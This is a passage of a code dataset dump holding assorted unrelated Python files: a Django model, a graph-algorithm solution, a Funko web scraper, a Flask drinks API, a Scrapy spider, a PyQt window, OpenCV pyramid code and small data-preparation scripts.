'titForTat'\n\n","sub_path":"titForTat.py","file_name":"titForTat.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378493638","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Project(models.Model):\n # 사진 ImageField(upload_to=None, height_field=None, width_field=None, max_length=100, **options)참\n image = 
models.ImageField(default=\"\", blank=True)\n # 파일업로드\n file = models.FileField(upload_to='uploads', default=\"\", blank=True)\n\n project_title = models.CharField(max_length=100) # 프로젝트 제목\n project_shorten = models.TextField(default=\"\", max_length=100) # 프로젝트 간략설명(2줄 이내)\n project_text = models.TextField() # 프로젝트 상세설명\n project_date = models.DateField('Date Finished') # 프로젝트 날짜\n project_member = models.TextField(default=\"No one\") # 멤버 이름\n project_extra = models.TextField(default=\"\", blank=True) # 기타정보\n project_year_semester = models.TextField() # 년도-학기\n project_year = models.TextField() # 년도\n\n def project_year_semester(self):\n if self.project_date.month >= 1 & self.project_date.month <= 6:\n semester = 1\n elif self.project_date.month >= 7 & self.project_date.month <= 12:\n semester = 2\n else:\n semester = 3\n return str(self.project_date.year) + '-' + str(semester)\n\n def project_year(self):\n return str(self.project_date.year)\n\n def publish(self):\n self.project_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.project_title\n","sub_path":"homepage/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576077647","text":"import sys\nread=lambda:sys.stdin.readline().strip()\nwrite=lambda x:sys.stdout.write(str(x)+\"\\n\")\nN = int(read())\nM = int(read())\nrel = [[100 for _ in range(N)] for __ in range(N)]\nfor _ in range(M):\n a, b = map(int, read().split())\n rel[a-1][b-1] = 1\n rel[b-1][a-1] = 1\n\nfor k in range(N):\n for i in range(N):\n A = rel[i][k]\n if not A:\n continue \n for j in range(N):\n if i == j or j == k:\n continue\n B = rel[k][j]\n if not B:\n continue\n C = rel[i][j]\n if C > A + B:\n rel[i][j] = A + B\n\ngroups = []\npeople = {i for i in range(N)}\nfor i in range(N):\n group = set()\n if i not in people:\n continue\n for j in range(N):\n if rel[i][j] != 100 or i == j:\n group.add(j)\n people.remove(j)\n groups.append(group)\n\nwrite(len(groups))\nresult = []\nfor group in groups:\n gidx, gmin = -1, 100 \n for person in group:\n rels = [c for c in rel[person] if c != 100]\n if not rels:\n gidx = person\n continue\n cnt = max(rels)\n if cnt < gmin:\n gidx = person\n gmin = cnt\n result.append(gidx)\nfor r in sorted(result):\n write(r+1)\n\n\n'''\n플로이드 와셜 말고 다릏게 풀수 있긴함..\n1. 양방향 그래프이기 때문에, dfs돌면 컴포넌트 단위로 잘라낼 수 있음.\n그러면서 각 사람이 어느 그룹에 속해있는지 기록해둔다.\n\n2. 그렇게 하고나서 각 사람을 기준으로 dijstra를 한다.\n그 과정에서 같은 그룹에 속해있지 않으면 continue해버린다.\n그 결과를 dist table에 저장하고, max distance가 최소가 되는 노드를 찾는다.\n\n3. 그럼 플로이드 보다 빠름. 
\n\n\n'''","sub_path":"graph_problems/Shortest_path/dijikstra/preparing_conference_2610.py","file_name":"preparing_conference_2610.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500236859","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-10-19 15:19:20\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os\ndef parrot(voltage, state = 'a stiff', action = 'voom', type = 'Norwegian Blue'):\n\tprint(\"-- This parrot wouldn't \", action, end=' ')\n\tprint(\"if you put \", voltage, \" volts through it.\")\n\tprint(\"-- Lovely plumage, the\", type)\n\tprint(\"-- It's \",state,\"!\")\n\nparrot(1000)\nparrot(voltage = 1000)\nparrot(voltage = 1000000, action = \"VOOOOOM\")\nparrot(action = \"VOOOOOM\", voltage = 1000000)\nparrot('a million', 'bereft of life', 'jump')\nparrot('a thousand', state='pushing up the daisies')\n\nos.system(\"pause\")\n","sub_path":"keywordarguments.py","file_name":"keywordarguments.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"107471731","text":"import requests\nimport bs4\nfrom replit import db\n\nbigboys_URL = 'https://www.bigboys.ph/FUNKO-c16020004'\nfilbarstore_URL = 'https://shop.filbars.online/collections/funko'\n\nheaders = {\n \"User-Agent\":\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"\n}\n\n\ndef checkbigboys():\n\n pops = ''\n\n page = requests.get(bigboys_URL, headers=headers)\n\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n for funko in db['items']:\n for item in soup.find_all('div', attrs={'class':\n 'grid-product__wrap'}):\n item_name = item.find('div',\n attrs={'class': 'grid-product__title-inner'})\n if funko in item_name.text:\n pops = pops + item_name.text.strip()\n price = item.find(\n 'div',\n attrs={'class': 'grid-product__price-value ec-price-item'})\n pops = pops + ' ' + price.text.strip() + '\\n '\n try:\n return (pops)\n except:\n return ('None')\n\n\ndef checkfilbarstore():\n\n pops = ' '\n\n page = requests.get(filbarstore_URL, headers=headers)\n\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n for funko in db['items']:\n for items in soup.find_all('a', attrs={'class': 'product-card'}):\n item_name = items.find('div',\n attrs={'class': 'product-card__name'})\n if funko in item_name.text:\n pops = pops + item_name.text.strip()\n price = items.find('div',\n attrs={'class': 'product-card__price'})\n pops = pops + ' ' + price.text.strip() + '\\n '\n try:\n return (pops)\n except:\n return ('None')\n\n\ndef update_items(item_to_find):\n if 'items' in db.keys():\n items = db['items']\n items.append(item_to_find)\n db['items'] = items\n else:\n db['items'] = ['Avatar']\n\n\ndef delete_item(index):\n items = db['items']\n if len(items) > index:\n del items[index]\n db['items'] = items\n\n\ndef get_helpmessage():\n\n help_message = \"\"\"Commands:\n&funkome - start searching for funko pops\n&help - list of commands\n\n&new_item -keyword here- to add a new keyword that the bot will use to search\n&del_item -keyword here- to delete a keyword that the bot can use to search\n&list_items - to show the keywords that the bot will use to search\n \"\"\"\n return 
(help_message)\n","sub_path":"Webscrape.py","file_name":"Webscrape.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"328378943","text":"from deeppavlov.core.components import Component\nfrom deeppavlov.core.registrable import Registrable\nfrom collections import Counter, defaultdict\nimport numpy as np\nfrom overrides import overrides\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Vocabulary:\n    def __init__(self, tokens=None, special_tokens=tuple(), dict_file_path=None):\n        if tokens is None and dict_file_path is not None:\n            tokens = self.load(dict_file_path)\n        self._t2i = dict()\n        # We set default ind to position of <UNK> in SPECIAL_TOKENS\n        # because the tokens will be added to dict in the same order as\n        # in special_tokens\n        default_ind = 0\n        self._t2i = defaultdict(lambda: default_ind)\n        self._i2t = dict()\n        self.frequencies = Counter()\n\n        self.counter = 0\n        for token in special_tokens:\n            self._t2i[token] = self.counter\n            self.frequencies[token] += 0\n            self._i2t[self.counter] = token\n            self.counter += 1\n        if tokens is not None:\n            self.update_dict(tokens)\n\n    def update_dict(self, tokens):\n        for token in tokens:\n            if not isinstance(token, str):\n                self.update_dict(token)\n            else:\n                if token not in self._t2i:\n                    self._t2i[token] = self.counter\n                    self._i2t[self.counter] = token\n                    self.counter += 1\n                self.frequencies[token] += 1\n\n    def idx2tok(self, idx):\n        return self._i2t[idx]\n\n    def idxs2toks(self, idxs, filter_paddings=False):\n        toks = []\n        for idx in idxs:\n            if not filter_paddings or idx != self.tok2idx('<PAD>'):\n                toks.append(self._i2t[idx])\n        return toks\n\n    def process(self, tokens):\n        if not isinstance(tokens, str):\n            return [self.process(token) for token in tokens]\n        else:\n            return self.tok2idx(tokens)\n\n    def tok2idx(self, tok):\n        return self._t2i[tok]\n\n    def toks2idxs(self, toks):\n        return [self._t2i[tok] for tok in toks]\n\n    def batch_toks2batch_idxs(self, b_toks):\n        max_len = max(len(toks) for toks in b_toks)\n        # Create array filled with paddings\n        batch = np.ones([len(b_toks), max_len]) * self.tok2idx('<PAD>')\n        for n, tokens in enumerate(b_toks):\n            idxs = self.toks2idxs(tokens)\n            batch[n, :len(idxs)] = idxs\n        return batch\n\n    def batch_idxs2batch_toks(self, b_idxs, filter_paddings=False):\n        return [self.idxs2toks(idxs, filter_paddings) for idxs in b_idxs]\n\n    def is_pad(self, x_t):\n        assert type(x_t) == np.ndarray\n        return x_t == self.tok2idx('<PAD>')\n\n    def __getitem__(self, key):\n        return self._t2i[key]\n\n    def __len__(self):\n        return self.counter\n\n    def __contains__(self, item):\n        return item in self._t2i\n\n    def load(self, dict_file_path):\n        tokens = list()\n        with open(dict_file_path) as f:\n            for line in f:\n                if len(line) > 0:\n                    tokens.append(line.strip())\n        return tokens\n\n    def save(self, path):\n        with open(path, \"w+\") as f:\n            for token in self._t2i.keys():\n                f.write(\"%s\\n\" % token)\n\n\n@Registrable.register(\"vocab\")\nclass VocabComponent(Component):\n    def __init__(self, config):\n        super().__init__(config)\n        self.local_input_names = ['tokens']\n        self.local_output_names = ['idxs']\n        self.vocab = Vocabulary()\n\n    @overrides\n    def forward(self, smem, add_local_mem=False):\n        if len(self.inputs) > 0 and len(self.outputs) > 0:\n            samples = self.get_input(\"tokens\", smem)\n            result = self.vocab.process(samples)\n            self.set_output(\"idxs\", result, smem)\n\n    @overrides\n    def train(self, smem, add_local_mem=False):\n        tokens = self.get_input(\"tokens\", smem)\n        
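# grow the vocabulary with the tokens observed during training\n        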
self.vocab.update_dict(tokens)\n\n @overrides\n def save(self):\n if \"save_to\" in self.config:\n path = self.config[\"save_to\"]\n import os\n os.makedirs(os.path.dirname(path), exist_ok=True)\n self.vocab.save(path)\n\n @overrides\n def load(self):\n if \"load\" in self.config:\n path = self.config[\"load\"]\n self.vocab.update_dict(self.vocab.load(path))\n\n @overrides\n def setup(self, components={}):\n super().setup(components)\n self.load()\n\n\n@Registrable.register(\"bow\")\nclass BowComponent(VocabComponent):\n def __init__(self, config):\n super().__init__(config)\n self.local_input_names = ['tokens']\n self.local_output_names = ['bow']\n\n @overrides\n def forward(self, smem, add_local_mem=False):\n if len(self.inputs) > 0 and len(self.outputs) > 0:\n tokens = self.get_input(\"tokens\", smem)\n bow = np.zeros([len(self.vocab)], dtype=np.int32)\n for word in tokens:\n if word in self.vocab:\n idx = self.vocab.tok2idx(word)\n bow[idx] += 1\n self.set_output(\"bow\", bow, smem)","sub_path":"deeppavlov/core/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505536626","text":"from sklearn.model_selection import train_test_split\n\n\nDATA_DIR = 'C:/Users/nuaax/Dropbox/data61/project/stance_classification/dataset/semeval/'\nTRAIN_DEV = DATA_DIR + 'semeval2016-task6-subtaskA-train-dev-%s.txt'\nTRAIN = DATA_DIR + 'semeval2016-task6-subtaskA-train-%s.txt'\nDEV = DATA_DIR + 'semeval2016-task6-subtaskA-dev-%s.txt'\n\n\ndata_size_tr = {\n 'a': 513,\n 'cc': 395,\n 'fm': 664,\n 'hc': 689,\n 'la': 653,\n}\n\ntarget_name = {\n 'a': 'Atheism',\n 'cc': 'Climate Change is a Real Concern',\n 'fm': 'Feminist Movement',\n 'hc': 'Hillary Clinton',\n 'la': 'Legalization of Abortion',\n}\n\n\ndef create_dev_set(t, ignore_header=True):\n \"\"\"\n Create validation set from training set based on stratified split\n \"\"\"\n with open(TRAIN_DEV % t, encoding='windows-1252') as train_dev_file:\n X = []\n y = []\n if ignore_header:\n next(train_dev_file)\n for line in train_dev_file:\n _id, target, text, label = line.strip().split('\\t')\n assert target == target_name[t]\n X.append((_id, target, text))\n y.append(label)\n assert len(X) == len(y) == data_size_tr[t]\n X_train, X_dev, y_train, y_dev = train_test_split(X, y,\n test_size=0.1,\n random_state=42,\n stratify=y)\n print('X_train:', len(X_train))\n print('y_train:', len(y_train))\n print('X_dev:', len(X_dev))\n print('y_dev:', len(y_dev))\n\n assert len(X_train) + len(X_dev) == data_size_tr[t]\n assert len(y_train) + len(y_dev) == data_size_tr[t]\n\n n_f_train = len([label for label in y_train if label == 'FAVOR'])\n n_a_train = len([label for label in y_train if label == 'AGAINST'])\n n_n_train = len([label for label in y_train if label == 'NONE'])\n\n n_f_dev = len([label for label in y_dev if label == 'FAVOR'])\n n_a_dev = len([label for label in y_dev if label == 'AGAINST'])\n n_n_dev = len([label for label in y_dev if label == 'NONE'])\n\n print('training set\\n\\t#f: %d, #a: %d, #n: %d, f/a: %f, a/n: %f'\n % (n_f_train, n_a_train, n_n_train, n_f_train/n_a_train, n_a_train/n_n_train))\n print('development set\\n\\t#f: %d, #a: %d, #n: %d, f/a: %f, a/n: %f'\n % (n_f_dev, n_a_dev, n_n_dev, n_f_dev/n_a_dev, n_a_dev/n_n_dev))\n\n # write to train\n print('saving to %s ...' 
% (TRAIN % t))\n    with open(TRAIN % t, 'w') as train_file:\n        if ignore_header:\n            train_file.write('ID\\tTarget\\tTweet\\tStance\\n')\n        for i in range(len(X_train)):\n            train_file.write('\\t'.join(X_train[i]) + '\\t' + y_train[i] + '\\n')\n    print('saved.')\n\n    # write to dev\n    print('saving to %s ...' % (DEV % t))\n    with open(DEV % t, 'w') as dev_file:\n        if ignore_header:\n            dev_file.write('ID\\tTarget\\tTweet\\tStance\\n')\n        for i in range(len(X_dev)):\n            dev_file.write('\\t'.join(X_dev[i]) + '\\t' + y_dev[i] + '\\n')\n    print('saved.')\n\n\nif __name__ == '__main__':\n    # create_dev_set('a')\n    # create_dev_set('cc')\n    # create_dev_set('fm')\n    # create_dev_set('hc')\n    # create_dev_set('la')\n    pass\n\n","sub_path":"datasets/prepare_semeval16.py","file_name":"prepare_semeval16.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"467713889","text":"import os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\nfrom database.models import db_drop_and_create_all, setup_db, Drink\nfrom auth.auth import AuthError, requires_auth\n\napp = Flask(__name__)\nsetup_db(app)\nCORS(app)\n\n# uncomment the line below only on the first run, to create the db;\n# re-comment it afterwards so the data is not erased on every start\n\n# db_drop_and_create_all()\n\n# ROUTES\n\n\n@app.route('/drinks')\ndef get_drinks():\n    try:\n\n        drinks = Drink.query.all()\n\n        results = []\n\n        for drink in drinks:\n            results.append(drink.short())\n\n        return jsonify({\n            'success': True,\n            'drinks': results\n        }), 200\n    except:\n        abort(404)\n\n\n@app.route('/drinks-detail')\n@requires_auth('get:drinks-detail')\ndef get_drink_details(jwt):\n\n    try:\n        drinks = Drink.query.all()\n\n        results = []\n        if drinks:\n            for drink in drinks:\n                results.append(drink.long())\n\n        return jsonify({\n            'success': True,\n            'drinks': results\n        }), 200\n    except:\n        abort(404)\n\n\n@app.route('/drinks', methods=['POST'])\n@requires_auth('post:drinks')\ndef post_drinks(jwt):\n\n    try:\n        data = request.get_json()\n\n        title = data['title']\n        recipe = data['recipe']\n        drink = Drink(title=title, recipe=json.dumps(recipe))\n        drink.insert()\n\n        return jsonify({\n            'success': True,\n            'drinks': drink.long()\n        }), 200\n    except:\n        abort(400)\n\n\n@app.route('/drinks/<int:drink_id>', methods=['PATCH'])\n@requires_auth('patch:drinks')\ndef update_drink(jwt, 
drink_id):\n\n    try:\n        data = request.get_json()\n\n        drink = Drink.query.filter(Drink.id == drink_id).first()\n\n        if not drink:\n            abort(404)\n\n        title = ''\n\n        if 'title' in data:\n            title = data['title']\n        else:\n            title = drink.title\n\n        recipe = ''\n        if 'recipe' in data:\n            recipe = data['recipe']\n        else:\n            recipe = drink.recipe\n\n        drink.title = title\n        drink.recipe = str(recipe)\n        drink.update()\n\n        result = []\n\n        result.append(drink.long())\n\n        return jsonify({\n            'success': True,\n            'drinks': result\n        }), 200\n    except:\n        abort(404)\n\n\n@app.route('/drinks/<int:drink_id>', methods=['DELETE'])\n@requires_auth('delete:drinks')\ndef delete_drink(jwt, drink_id):\n\n    try:\n\n        drink = Drink.query.filter(Drink.id == drink_id).first()\n\n        if not drink:\n            abort(404)\n\n        drink.delete()\n\n        return jsonify({\n            'success': True,\n            'delete': drink_id\n        }), 200\n    except:\n        abort(404)\n\n# Error Handling\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n    return jsonify({\n        \"success\": False,\n        \"error\": 422,\n        \"message\": \"unprocessable\"\n    }), 422\n\n\n@app.errorhandler(404)\ndef not_found(error):\n\n    return jsonify({\n        'success': False,\n        'error': 404,\n        'message': 'resource not found'\n    }), 404\n\n\n@app.errorhandler(AuthError)\ndef auth_error(error):\n\n    return jsonify({\n        'success': False,\n        'error': error.error,\n        'message': 'Authentication error'\n    }), error.status_code\n\n\nif __name__ == '__main__':\n    port = int(os.environ.get(\"PORT\", 5000))\n    app.run(host='0.0.0.0', port=port)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"416011993","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'oyilmaz'\n\nimport scrapy\nimport datetime\nimport urlparse\nimport logging\nfrom time import strftime, gmtime\nfrom scrapy import log, signals\nfrom scrapy.conf import settings\nfrom scrapy.xlib.pydispatch import dispatcher\n\n\nfrom ..items import ModagramProduct\n\nclass ModagramSpider(scrapy.Spider):\n\n\tname = 'modagram'\n\tallowed_domains = ['www.modagram.com']\n\tstart_urls = ['http://www.modagram.com/kadin/urunleri/liste?f_c1=1-2-337-338']\n\t\n\tBASE_URL = 'http://www.modagram.com'\n\n\tdef __init__(self, **kwargs):\n\n\t\tsuper(ModagramSpider, self).__init__(**kwargs)\n\t\tself.matrix_id_set = set()\n\t\tdispatcher.connect(self.spider_closed, signals.spider_closed)\n\n\tdef spider_closed(self, spider):\n\t\t\n\t\tlogging.info('Total number of ProductVariantMatrixIds: %d' % len(self.matrix_id_set))\n\n\t\tnow = strftime('%Y-%m-%d %H:%M:%S', gmtime())\n\t\twith open('mg_live_products_{date}.csv'.format(date=now), 'w') as f:\n\t\t\tf.write('ProductVariantMatrixId\\n')\n\t\t\tfor id in self.matrix_id_set:\n\t\t\t\tf.write(id + '\\n')\n\n\n\tdef parse(self, response):\n\n\t\tpages = response.xpath('//*[@id=\"ProductList\"]/div[1]/div[3]//a/text()').extract()[:-1]\n\t\ttotal_pages = max(map(int, pages))\n\t\tnext_page = 1\n\n\t\turl = 'liste?f_c1=1-2-337-338&page={page_no}'\n\t\tbase_url = 'http://www.modagram.com/kadin/urunleri/liste?f_c1=1-2-337-338'\n\t\t# while(next_page <= total_pages):\n\t\t# \tprint next_page\n\t\t# \treturn scrapy.Request(\n\t\t# \t\turlparse.urljoin(self.BASE_URL, url.format(page_no=next_page)),\n\t\t# \t\tcallback = self.parse_products\n\t\t# \t\t)\n\t\t# \tnext_page += 1\n\t\treturn scrapy.Request(\n\t\t\t\turlparse.urljoin(base_url, url.format(page_no=next_page)),\n\t\t\t\tcallback = self.parse_products\n\t\t\t\t)\n\n\t\t\n\n\tdef parse_products(self, response):\n\n\t\tproduct_list = 
response.xpath('//ol[@id=\"OrderedProducts\"]//li')\n\n\t\tfor product in product_list:\n\t\t\turl = product.xpath('.//a/@href').extract()[0]\n\t\t\t\n\t\t\tyield scrapy.Request(\n\t\t\t\turlparse.urljoin(self.BASE_URL, url),\n\t\t\t\tcallback = self.parse_product_details\n\t\t\t\t)\n\n\tdef parse_product_details(self, response):\n\n\t\tproduct = ModagramProduct()\n\t\t\n\t\tmatrix_ids = response.xpath('//div[@class=\"ProductSize\"]//a[@stockqty!=\"0\"]/@matrixid').extract()\n\n\t\tfor id in matrix_ids:\n\t\t\tself.matrix_id_set.add(id)\n\n\n","sub_path":"modagram_scraper/spiders/modagram_spider.py","file_name":"modagram_spider.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"35755786","text":"from PyQt4 import QtCore,QtGui \nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport sys\nimport os\nimport bs4\nimport urllib\nimport threading\nimport time\nimport requests\nimport webbrowser\n\n# DEFAULT_COLOR = \"#2a2727\" # Think about this color :)\nDEFAULT_COLOR = \"#3498db\"\n\nclass MainWindow(QWidget):\n def __init__(self,parent=None):\n super(MainWindow,self).__init__(parent)\n\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n\n self.btc = \"\"\n \n\n def window(self):\n self.setGeometry(100,100,600,700)\n\n QtGui.QFontDatabase.addApplicationFont(resource_path(r'Fonts\\Ubuntu-Light.ttf'))\n\n # self.setStyleSheet(\"QWidget{background-color:#DFE6EC;font-family:'Ubuntu Light';border:0px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n\n self.border = QLabel(self)\n self.border.setGeometry(0,0,600,700)\n self.border.setStyleSheet(\"border:2px solid \"+DEFAULT_COLOR+\";border-bottom:transparent;botder-right:transparent;border-top:transparent;\")\n self.border.setDisabled(True)\n\n self.logo = QPushButton(self)\n self.logo.setStyleSheet(\"background-color:transparent;border:0;\")\n self.logo.setIcon(QIcon(resource_path(r\"Icons\\logo.png\")))\n self.logo.setIconSize(QSize(390,100))\n self.logo.move(10,-5)\n\n\n close = QPushButton(self)\n close.setGeometry(530,20,50,50)\n close.setStyleSheet(\".QPushButton{background-color:transparent;}\")\n # close.setStyleSheet(\".QPushButton{background-color:transparent;border:0;border-bottom:0px solid #34495e;} .QPushButton:hover{background-color:\"+DEFAULT_COLOR_HOVER+\";} .QPushButton:pressed{border-top:2px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n close.setIcon(QIcon(resource_path(r\"Icons\\close.png\")))\n close.setIconSize(QSize(18,18))\n close.setCursor(Qt.PointingHandCursor)\n close.clicked.connect(self.close)\n \n # minim = QPushButton(self)\n # minim.setGeometry(500,0,50,50)\n # # minim.setStyleSheet(\".QPushButton{background-color:transparent;border:0;border-bottom:0px solid #34495e;} .QPushButton:hover{background-color:\"+DEFAULT_COLOR_HOVER+\";} .QPushButton:pressed{border-top:2px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n # minim.setIcon(QIcon(resource_path(r\"Icons\\minim.png\")))\n # minim.setIconSize(QSize(15,15))\n # minim.setCursor(Qt.PointingHandCursor)\n # minim.clicked.connect(self.showMinimized)\n\n thread = threading.Thread(target=self.animate)\n thread.start()\n\n frameGm = self.frameGeometry()\n screen = QtGui.QApplication.desktop().screenNumber(QtGui.QApplication.desktop().cursor().pos())\n centerPoint = QtGui.QApplication.desktop().screenGeometry(screen).center()\n frameGm.moveCenter(centerPoint)\n self.move(frameGm.topLeft())\n self.setWindowTitle(\"Tomos Mining\")\n pos1 = self.x()\n pos2 = self.y()\n 
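# animate the window sliding from y=900 to its centered position (pos1, pos2)\n        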
position_animator(self,pos1,900,pos1,pos2,duration=600)\n self.setWindowIcon(QIcon(resource_path(r\"Icons\\icon.png\")))\n self.show()\n def animate(self):\n opcty = 0.0\n for i in range(11):\n time.sleep(0.06)\n self.setWindowOpacity(opcty)\n opcty+=0.1\n\ndef position_animator(obj = None,from_x = 0,from_y = 0,to_x = 0,to_y = 0,duration=500):\n animation = QPropertyAnimation(obj,\"geometry\",obj)\n animation.setStartValue(QRect(from_x,from_y,obj.width(),obj.height()))\n animation.setEndValue(QRect(to_x,to_y,obj.width(),obj.height()))\n animation.setDuration(duration)\n animation.setEasingCurve(QEasingCurve.OutQuart)\n animation.start()\n\ndef size_animator(obj = None,from_width = 0,from_height = 0,to_width = 0,to_height = 0,duration=500):\n animation = QPropertyAnimation(obj,\"geometry\",obj)\n animation.setStartValue(QRect(obj.x(),obj.y(),from_width,from_height))\n animation.setEndValue(QRect(obj.x(),obj.y(),to_width,to_height))\n animation.setDuration(duration)\n animation.setEasingCurve(QEasingCurve.OutQuart)\n animation.start()\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n wndw = MainWindow()\n wndw.window()\n sys.exit(app.exec_())","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357986576","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt \r\n\r\nimg = cv2.imread(\"baboon.jpg\")\r\n\r\ngp = [img] #gaussian pyramid\r\nfor i in range(6):\r\n\timg = cv2.pyrDown(img)\r\n\tgp.append(img)\r\n\tcv2.imshow(str(i),img)\r\nimg = gp[5]\r\ncv2.imshow('gpimg',img)\r\n\r\nlp = [img] #laplacian pyramid \r\nfor i in range(5, 0, -1):\r\n\text = cv2.pyrUp(gp[i])\r\n\tlap = cv2.subtract(gp[i-1],ext)\r\n\tlp.append(lap)\r\n\tcv2.imshow(str(i),lap)\r\nimg = lp[5]\r\ncv2.imshow('lpimg',img)\r\n\r\nplt.show()\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"gaussian and laplacian pyramid/pyramid2.py","file_name":"pyramid2.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"335034589","text":"import xml.etree.ElementTree as ET\nimport glob\nimport os\n\n# NOTE: remove xml file with no annotation\n# src = '/home/hoang/datasets/JR/test/annos/'\n# files = glob.glob(src + '*.xml')\n#\n# for file in files:\n# print(file)\n# tree = ET.parse(file)\n# root = tree.getroot()\n# if root.find('object') is None:\n# os.remove(file)\n\n# NOTE: remove image with no annotation\nroot = '/home/hoang/datasets/JR/train'\nimages_dir = root + '/images/'\nannos_dir = root + '/annos/'\nxml_files = glob.glob(annos_dir + '*.xml')\nimg_files = glob.glob(images_dir + '*.jpg')\nfname = []\nfor xml in xml_files:\n name = os.path.basename(xml)\n _name, _ = os.path.splitext(name)\n fname.append(_name)\n\nfor image in img_files:\n name = os.path.basename(image)\n _name, _ = os.path.splitext(name)\n if _name not in fname:\n 
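# no matching annotation file exists, so drop the orphan image\n        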
os.remove(image)\n\n","sub_path":"tools/check_xml.py","file_name":"check_xml.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"548789231","text":"\"\"\"Working with list values.\"\"\"\nfrom redis_python_tutorial.logging import logger\n\n\ndef list_values_demo(r):\n \"\"\"Push and pop items from a list.\"\"\"\n # Add single string to a new list.\n r.lpush('my_list', 'A')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push second string to list from the right.\n r.rpush('my_list', 'B')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push third string to list from the right.\n r.rpush('my_list', 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Remove 1 instance from the list where the value equals 'C'.\n r.lrem('my_list', 1, 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push a string to our list from the left.\n r.lpush('my_list', 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Pop first element of our list and move it to the back.\n r.rpush('my_list', r.lpop('my_list'))\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n","sub_path":"redis_python_tutorial/data/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394161715","text":"#!python\nfrom helpers import iter_group_test, iter_group\nfrom string import ascii_lowercase\n\ndef countQuestions(groupdata):\n count = 0\n for letter in ascii_lowercase:\n good = True\n for answers in groupdata.splitlines():\n if letter not in answers:\n good = False\n break\n if good:\n count +=1\n return count\n\ngroupcounts = []\nfor group in iter_group(6):\n groupcounts.append(countQuestions(group))\nprint(sum(groupcounts))\n","sub_path":"6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"273411188","text":"def getFileData(fileName):\n f = open(fileName , 'r')\n data = f.read().split('\\n')\n\n return data\n\ndef insertUniqueValue(dbFile, inputFile):\n dbData = getFileData(dbFile)\n inputData = getFileData(inputFile)\n\n length = len(inputData)\n proc = 0\n\n for i in range(0, length):\n\n newProc = 100 * i / length\n\n if proc != newProc:\n proc = newProc\n print(str(proc) + '%')\n\n if not (inputData[i] in dbData):\n dbData.append(inputData[i])\n\n f = open(dbFile, 'w')\n f.write('\\n'.join(map(str, dbData)))\n f.close()\n\n print('100%')","sub_path":"src/filework.py","file_name":"filework.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154500648","text":"from psycopg2 import sql\nimport csv\nimport os\nimport shutil\nfrom Model.QueryManager import QueryManager\n\n\nclass 